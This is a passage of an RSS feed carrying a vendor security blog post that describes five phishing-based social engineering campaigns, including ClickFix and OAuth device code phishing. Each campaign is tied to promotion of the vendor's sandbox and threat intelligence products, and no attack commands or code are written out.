platforms.</p> </div> </div>



<p></p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/mssp-growth-guide-ti-feeds/">How Can MSSPs Scale Threat Detection Without Burning Out Their Analysts?</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/mssp-growth-guide-ti-feeds/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Top 5 Phishing-Driven Social Engineering Attacks on Companies in 2026</title>
		<link>https://any.run/cybersecurity-blog/social-engineering-attacks-2026/</link>
					<comments>https://any.run/cybersecurity-blog/social-engineering-attacks-2026/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Tue, 19 May 2026 11:08:08 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[malware analysis]]></category>
		<category><![CDATA[malware behavior]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=21024</guid>

					<description><![CDATA[<p>Your employees are not falling for “bad grammar” phishing anymore. They are being pulled into fake Microsoft logins, banking pages, AI tool instructions, real OAuth flows, and event invitations that look close enough to daily work to pass without alarm.&#160; For CISOs, that is the real social engineering problem in 2026: attacks are no longer [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/social-engineering-attacks-2026/">Top 5 Phishing-Driven Social Engineering Attacks on Companies in 2026</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Your employees are not falling for “bad grammar” phishing anymore. They are being pulled into fake Microsoft logins, banking pages, AI tool instructions, real OAuth flows, and event invitations that look close enough to daily work to pass without alarm.&nbsp;</p>



<p>For CISOs, that is the real social engineering problem in 2026: attacks are no longer easy to separate from normal business activity. And when the SOC cannot quickly see what happened after the click, every investigation becomes a race against exposure.&nbsp;</p>



<h2 class="wp-block-heading">The New CISO Problem: Social Engineering That Looks Like Business as Usual&nbsp;</h2>



<p>Modern social engineering attacks are harder to stop because they no longer rely only on suspicious attachments or poorly written emails. They copy the workflows employees use every day.&nbsp;</p>



<p>For CISOs, this&nbsp;leads to&nbsp;difficult operational&nbsp;issues. The SOC may detect a suspicious link, page, or login attempt, but still lack the full context to understand whether the incident led to credential theft, token abuse, remote access, or exposure of business-critical systems.&nbsp;</p>



<p>That creates several problems at once:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Too many&nbsp;gray-zone alerts</strong>&nbsp;that require manual validation&nbsp;</li>



<li><strong>Slow confidence during triage</strong>&nbsp;because the activity looks close to legitimate work&nbsp;</li>



<li><strong>Context gaps between Tier 1, Tier 2, and IR teams</strong>&nbsp;</li>



<li><strong>Delayed prioritization</strong>&nbsp;when the business impact is unclear&nbsp;</li>



<li><strong>Higher pressure on senior SOC resources</strong>&nbsp;due to unnecessary or poorly prepared escalations&nbsp;</li>



<li><strong>Limited executive visibility</strong>&nbsp;into whether the incident is a minor phishing attempt or a real access risk&nbsp;</li>
</ul>



<p>This is why modern social engineering is a visibility, escalation, and decision-making problem for the entire security operation.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Turn unclear phishing alerts into confident SOC decisions.<br>
<span class="highlight">Get special 10th anniversary offers from ANY.RUN.</span>
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://app.any.run/plans?/utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=social-engineering-attacks-2026&#038;utm_term=190526&#038;utm_content=linktosandboxpricing" rel="noopener" target="_blank">
Claim your exclusive deal
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">1. Fake Microsoft Login Pages Still Work Because They Abuse Daily Business Habits&nbsp;</h2>



<p>Fake Microsoft login pages&nbsp;remain&nbsp;one of the most common social engineering tactics because they imitate a workflow employees already trust: opening a shared file, checking email, accessing OneDrive, or signing into Microsoft 365.&nbsp;</p>



<p><a href="https://app.any.run/tasks/78f68113-7e05-44fc-968f-811c6a84463e/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=social-engineering-attacks-2026&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View analysis session with Microsoft page abuse</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="567" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.36.26-1024x567.png" alt="Fake Microsoft login page exposed inside ANY.RUN sandbox" class="wp-image-21031" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.36.26-1024x567.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.36.26-300x166.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.36.26-768x425.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.36.26-1536x850.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.36.26-2048x1133.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.36.26-370x205.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.36.26-270x149.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.36.26-740x409.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Fake Microsoft login page exposed&nbsp;inside ANY.RUN&nbsp;sandbox</em></figcaption></figure></div>


<p>For security leaders, the concern is that this attack still hits one of the most valuable parts of the business: identity. Microsoft accounts often connect employees to email, files, SaaS tools, internal conversations, customer communication, and partner access. Once one account is compromised, the impact can quickly move beyond a single inbox.&nbsp;</p>



<p><strong>CISO blind spot:</strong>&nbsp;The SOC may treat a fake login page as a simple phishing event, while the&nbsp;real business&nbsp;risk may be account takeover, email compromise, or lateral movement&nbsp;through connected cloud services.&nbsp;</p>



<h2 class="wp-block-heading">2. Banking Phishing Turns Employee Trust&nbsp;into&nbsp;Financial Exposure&nbsp;</h2>



<p>Banking-themed phishing attacks are especially risky because they target workflows employees may already treat as urgent: payment alerts, transaction issues, account notices, invoices, or financial document requests.&nbsp;</p>



<p>In the&nbsp;<a href="https://any.run/cybersecurity-blog/evasive-blob-phishing-detection/" target="_blank" rel="noreferrer noopener">BlobPhish campaign observed by ANY.RUN</a>, attackers impersonated major financial and cloud services, including Chase, Capital One, FDIC, E*TRADE, Schwab, Microsoft 365, OneDrive, and SharePoint. The campaign used phishing pages that appeared directly inside the browser, making them harder for traditional tools to detect&nbsp;through normal URL, file, or network visibility.&nbsp;</p>



<p><a href="https://app.any.run/tasks/191b74fc-fb9f-455a-9492-ca872871d0e1/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=social-engineering-attacks-2026&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View the observed analysis session in ANY.RUN&nbsp;sandbox</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="489" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/blob_1.png-1024x489.webp" alt="Phishing pseudo-MS365 page loaded as a blob object " class="wp-image-21033" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/blob_1.png-1024x489.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/blob_1.png-300x143.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/blob_1.png-768x367.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/blob_1.png-370x177.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/blob_1.png-270x129.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/blob_1.png-740x353.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/blob_1.png.webp 1137w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Phishing pseudo-MS365 page loaded as a blob object&nbsp;</em></figcaption></figure></div>


<p>The danger is that these lures touch systems tied to money, approvals, vendors, customer data, and cloud access. A single captured credential can open the door to payment fraud, mailbox abuse, partner-facing&nbsp;scams, or sensitive data exposure.&nbsp;</p>



<p><strong>CISO blind spot:</strong>&nbsp;A banking phishing lure may look like a narrow credential-theft attempt, but in a corporate environment, it can expose financial operations, cloud accounts, partner communication, and sensitive business data.&nbsp;</p>



<h2 class="wp-block-heading">3.&nbsp;ClickFix&nbsp;Attacks Abuse Employee Trust in AI Tools&nbsp;</h2>



<p>ClickFix&nbsp;attacks are becoming more dangerous as employees rely on AI tools for coding, research, automation, and daily productivity. Instead of sending a suspicious attachment, attackers imitate the tools people already use and guide them&nbsp;through actions that feel like normal setup or troubleshooting.&nbsp;</p>



<p>In&nbsp;<a href="https://any.run/cybersecurity-blog/macos-clickfix-amos-attack/" target="_blank" rel="noreferrer noopener">one ANY.RUN case</a>, attackers used fake documentation pages for popular AI tools, including Claude Code and Grok. The victim was prompted to run a command that&nbsp;appeared to be&nbsp;part of the installation or configuration process.&nbsp;In reality, that&nbsp;action launched a malware infection on macOS.&nbsp;</p>



<p><a href="https://app.any.run/tasks/74f5000d-aa91-4745-9fc7-fdd95549874b/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=social-engineering-attacks-2026&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Observe the attack chain in a live&nbsp;sandbox&nbsp;session</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="569" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-09.55.31-1024x569.png" alt="Multi-OS attack: malicious terminal commands for various platforms" class="wp-image-21034" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-09.55.31-1024x569.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-09.55.31-300x167.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-09.55.31-768x427.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-09.55.31-1536x853.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-09.55.31-2048x1138.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-09.55.31-370x206.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-09.55.31-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-09.55.31-740x411.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Multi-OS&nbsp;attack: malicious terminal commands for&nbsp;various&nbsp;platforms</em></figcaption></figure></div>


<p>This tactic is especially risky because it targets high-value users. Developers, product teams, finance employees, and executives often use Macs and AI tools, and they may also have access to source code, cloud environments, financial systems, customer data, or internal documents.&nbsp;</p>



<p><strong>CISO blind spot:</strong>&nbsp;ClickFix&nbsp;attacks may not look like a traditional phishing incident. The user is not opening a strange attachment. They are following instructions from&nbsp;what appears to be a&nbsp;trusted AI tool page. That makes the attack harder to catch early and easier to underestimate until credentials, session data, or endpoint access are already exposed.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Close the visibility gap around business-critical users.<br>
<span class="highlight">Unlock your ANY.RUN 10-year anniversary deal.</span>
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://app.any.run/plans/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=social-engineering-attacks-2026&#038;utm_term=190526&#038;utm_content=linktosandboxpricing" rel="noopener" target="_blank">
Get your special offer
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">4. OAuth Device Code Phishing Turns Legitimate Microsoft Login into an Access Risk&nbsp;</h2>



<p>OAuth device code phishing is dangerous as it does not follow the usual fake-login-page pattern. The victim is sent to a real Microsoft verification page, enters a code, completes authentication, and may even pass MFA.&nbsp;</p>



<p>In the&nbsp;<a href="https://any.run/cybersecurity-blog/oauth-device-code-phishing/" target="_blank" rel="noreferrer noopener">EvilTokens&nbsp;campaign&nbsp;observed&nbsp;by ANY.RUN</a>, attackers abused Microsoft’s OAuth Device Code flow to get access tokens without directly stealing the user’s password. More than 180 phishing URLs were detected in one week, showing how quickly this technique can spread across Microsoft 365 environments.&nbsp;</p>



<p><a href="https://app.any.run/tasks/885afc1c-b616-46d7-9bc3-81185ee07fe3?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=social-engineering-attacks-2026&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View sample analysis in ANY.RUN Interactive&nbsp;Sandbox</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="568" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.00.09-1024x568.png" alt="Full attack chain exposed in ANY.RUN Sandbox" class="wp-image-21036" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.00.09-1024x568.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.00.09-300x166.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.00.09-768x426.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.00.09-1536x852.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.00.09-2048x1136.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.00.09-370x205.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.00.09-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-19-at-10.00.09-740x411.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Full attack chain exposed in ANY.RUN&nbsp;Sandbox</em></figcaption></figure></div>


<p>This makes the attack harder to recognize as phishing. From the user’s side, the process looks legitimate. From the security team’s side, the activity may blend into normal authentication traffic until the account is already exposed.&nbsp;</p>



<p><strong>CISO blind spot:</strong>&nbsp;OAuth device code phishing may not trigger the same warning signs as a fake login page. The user authenticates&nbsp;through Microsoft, but the attacker receives the token. That can lead to Microsoft 365 account takeover, mailbox access, cloud data exposure, and delayed response because the compromise does not look like classic credential theft.&nbsp;</p>



<h2 class="wp-block-heading">5. Fake Invitations Turn Simple Lures&nbsp;into&nbsp;Access Risk&nbsp;</h2>



<p>Fake invitation phishing works because it feels harmless. An event invite, a CAPTCHA check, and a sign-in page can look like a normal online workflow, especially when employees are used to opening meeting links, webinars, vendor invitations, and shared business events.&nbsp;</p>



<p>In a&nbsp;<a href="https://any.run/cybersecurity-blog/us-fake-invitation-phishing/" target="_blank" rel="noreferrer noopener">U.S.-targeted campaign&nbsp;analyzed&nbsp;by ANY.RUN</a>, attackers used fake event invitation pages to push victims toward credential theft, OTP interception, or remote management tool installation. Some pages collected email credentials and one-time codes, while others delivered legitimate RMM tools such as&nbsp;ScreenConnect,&nbsp;ITarian, Datto RMM, ConnectWise, and LogMeIn Rescue.&nbsp;</p>



<p><a href="https://app.any.run/tasks/4c2687da-1426-43c3-8e16-868f90fb9361?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=social-engineering-attacks-2026&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View analysis session in ANY.RUN Sandbox</a></p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="554" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11.png-1024x554.webp" alt="Fake invitation used as a lure, exposed inside ANY.RUN sandbox" class="wp-image-21037" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11.png-1024x554.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11.png-300x162.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11.png-768x415.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11.png-1536x831.webp 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11.png-370x200.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11.png-270x146.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11.png-740x400.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11.png.webp 1875w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Fake&nbsp;invitation&nbsp;used&nbsp;as&nbsp;a&nbsp;lure, exposed inside ANY.RUN&nbsp;sandbox</em></figcaption></figure></div>


<p>That makes the campaign harder to judge quickly. The same type of lure can lead to different outcomes: stolen mailbox access, intercepted MFA codes, or remote access inside the environment. For the SOC, this creates a&nbsp;gray-zone investigation where several small signals need to be connected before the real risk becomes clear.&nbsp;</p>



<p><strong>CISO blind spot:</strong>&nbsp;A fake invitation may look like a low-priority phishing page, but it can become an access problem fast. If the SOC cannot quickly see whether the page led to credential theft, OTP capture, or RMM installation, response may start only after exposure has already grown.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Don’t let trusted login flows hide real compromise.<br>
<span class="highlight">Close blind spots with ANY.RUN&#8217;s special deals.</span>
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://app.any.run/plans?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=social-engineering-attacks-2026&#038;utm_term=190526&#038;utm_content=linktosandboxpricing" rel="noopener" target="_blank">
Get your special deal
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">How CISOs Can Close These Social Engineering Blind Spots&nbsp;</h2>



<p>The hardest part of modern social engineering response is often not spotting something suspicious. It is proving what happened next fast enough to make the right decision.&nbsp;</p>



<p>A suspicious email, link, page, or file may be detected, but the SOC still needs to answer the questions that&nbsp;determine&nbsp;the real risk: Did the user&nbsp;submit&nbsp;credentials? Was MFA or OAuth abused? Was remote access delivered? Did the activity reach an endpoint? Does this require escalation, containment, or leadership attention?&nbsp;</p>



<p>To close this gap, social engineering investigations need to move&nbsp;through a clearer workflow:&nbsp;</p>



<h3 class="wp-block-heading">1.&nbsp;Validate&nbsp;the&nbsp;threat&nbsp;before it becomes a bigger incident&nbsp;</h3>



<p>When a suspicious email, link, file, or phishing page reaches the SOC, the priority is not only to label it as malicious or benign. The team needs to understand what the object&nbsp;actually does&nbsp;and how far the activity could go if left unchecked.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="541" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-2048x1082.png-1024x541.webp" alt="Phishing sample analyzed inside ANY.RUN sandbox " class="wp-image-21040" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-2048x1082.png-1024x541.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-2048x1082.png-300x158.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-2048x1082.png-768x406.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-2048x1082.png-1536x812.webp 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-2048x1082.png-370x195.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-2048x1082.png-270x143.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-2048x1082.png-740x391.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-12.54.02-2048x1082.png.webp 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Phishing sample&nbsp;analyzed&nbsp;inside ANY.RUN&nbsp;sandbox</em>&nbsp;</figcaption></figure></div>


<p>ANY.RUN’s&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=social-engineering-attacks-2026&amp;utm_term=190526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive&nbsp;Sandbox</a>&nbsp;lets teams safely open the suspicious object and&nbsp;observe&nbsp;the full&nbsp;behavior&nbsp;in real time: redirects, fake login pages, OTP prompts, file downloads, remote access activity, and concealment attempts. Instead of guessing from isolated alerts, the SOC can see and interact whenever needed.&nbsp;</p>



<p>This gives teams earlier certainty during the most critical stage of triage. They can confirm the real risk faster, decide whether the case needs escalation, and reduce the chance that a “small” social engineering alert becomes a larger business incident.&nbsp;</p>



<h3 class="wp-block-heading">2. Turn investigation results into evidence the whole SOC can use&nbsp;</h3>



<p>Even when the attack is visible, teams still need to communicate the findings clearly. Raw telemetry can slow down handoffs, create context loss, and make it harder for managers to understand severity.&nbsp;</p>



<p>With&nbsp;<a href="https://any.run/cybersecurity-blog/soc-ready-reporting/" target="_blank" rel="noreferrer noopener">Tier 1 Reports</a>&nbsp;and AI Summary inside the&nbsp;sandbox, findings become structured, SOC-ready context: what happened, why it matters, what evidence supports escalation, and where the team should focus next.&nbsp;</p>



<figure class="wp-block-video"><video controls src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screen-Recording-2026-05-13-at-09.18.48.mov"></video></figure>



<p>This gives teams several practical benefits:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Faster triage</strong>&nbsp;because Tier 1 gets a clear&nbsp;threat&nbsp;overview without manually rebuilding the attack story&nbsp;</li>



<li><strong>Cleaner escalations</strong>&nbsp;as Tier 2 and IR receive context, not just raw indicators&nbsp;</li>



<li><strong>Less context loss</strong>&nbsp;when the case moves between teams or shifts&nbsp;</li>



<li><strong>More consistent reporting</strong>&nbsp;across analysts and incidents&nbsp;</li>



<li><strong>Clearer management visibility</strong>&nbsp;into severity, exposure, and&nbsp;required&nbsp;next steps&nbsp;</li>



<li><strong>Better response decisions</strong>&nbsp;because teams can act on confirmed&nbsp;behavior, not assumptions&nbsp;</li>
</ul>



<p>This way, social engineering investigations do not stop at “we found suspicious activity.” They become ready-to-use evidence for prioritization, escalation, containment, and leadership reporting.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Clarity for analysts. Visibility for decision-makers.<br>
<span class="highlight">Claim your 10th anniversary offer from ANY.RUN.</span>
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://app.any.run/plans?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=social-engineering-attacks-2026&#038;utm_term=190526&#038;utm_content=linktosandboxpricing" rel="noopener" target="_blank">
Get your special offer
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">3. Understand whether the case is isolated or part of a wider campaign&nbsp;</h3>



<p>After the&nbsp;behavior&nbsp;is confirmed, the next question is scope. Is this one phishing attempt, or part of a broader campaign targeting similar companies, industries, or regions?&nbsp;</p>



<p>With ANY.RUN&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=social-engineering-attacks-2026&amp;utm_term=190526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat&nbsp;Intelligence</a>, teams can pivot from one case to related domains, IOCs, URL patterns, infrastructure, and similar&nbsp;sandbox&nbsp;sessions. This gives the SOC broader context for detection, hunting, and prioritization, so teams are not making decisions from one alert alone.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="692" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/3-1.png-1024x692.webp" alt="" class="wp-image-21049" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/3-1.png-1024x692.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/3-1.png-300x203.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/3-1.png-768x519.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/3-1.png-370x250.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/3-1.png-270x183.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/3-1.png-740x500.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/3-1.png.webp 1383w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Relevant&nbsp;sandbox&nbsp;sessions displayed inside ANY.RUN’s TI Lookup for better context and deeper analysis</em>&nbsp;</figcaption></figure></div>


<p>For security leaders, this creates a stronger operating model for social engineering response:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Earlier risk confirmation</strong>&nbsp;before credential theft, token abuse, or remote access turns into a larger incident&nbsp;</li>



<li><strong>Better campaign awareness</strong>&nbsp;when one suspicious case is connected to related infrastructure and repeated attack patterns&nbsp;</li>



<li><strong>Stronger SOC consistency</strong>&nbsp;because investigations follow the same process instead of depending on individual experience&nbsp;</li>



<li><strong>Improved resource allocation</strong>&nbsp;as senior teams focus on cases with confirmed exposure,&nbsp;not unclear&nbsp;alerts&nbsp;</li>



<li><strong>More defensible incident decisions</strong>&nbsp;based on visible&nbsp;behavior,&nbsp;threat&nbsp;context, and structured reporting&nbsp;</li>



<li><strong>Clearer business-risk communication</strong>&nbsp;when leaders need to understand what happened, what is exposed, and what happens next&nbsp;</li>
</ul>



